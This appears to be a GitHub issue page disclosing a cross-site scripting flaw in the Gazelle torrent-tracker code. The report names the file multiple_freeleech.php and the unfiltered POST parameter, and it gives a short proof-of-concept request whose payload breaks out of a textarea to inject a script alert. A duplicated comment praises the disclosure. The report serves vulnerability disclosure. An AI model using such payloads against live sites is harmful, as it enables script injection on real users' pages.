aaronhenderson
commented
1 month ago Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.
Open xjzzzxx opened 1 month ago
aaronhenderson
commented
1 month ago Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
Source from
$_POST['torrents']without any filtering or checking which resulting in XSS.Poc
POST /sections/tools/managers/multiple_freeleech.phpWith the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>Manual verification
BTW,cms.gazelle.com in local(changes hosts)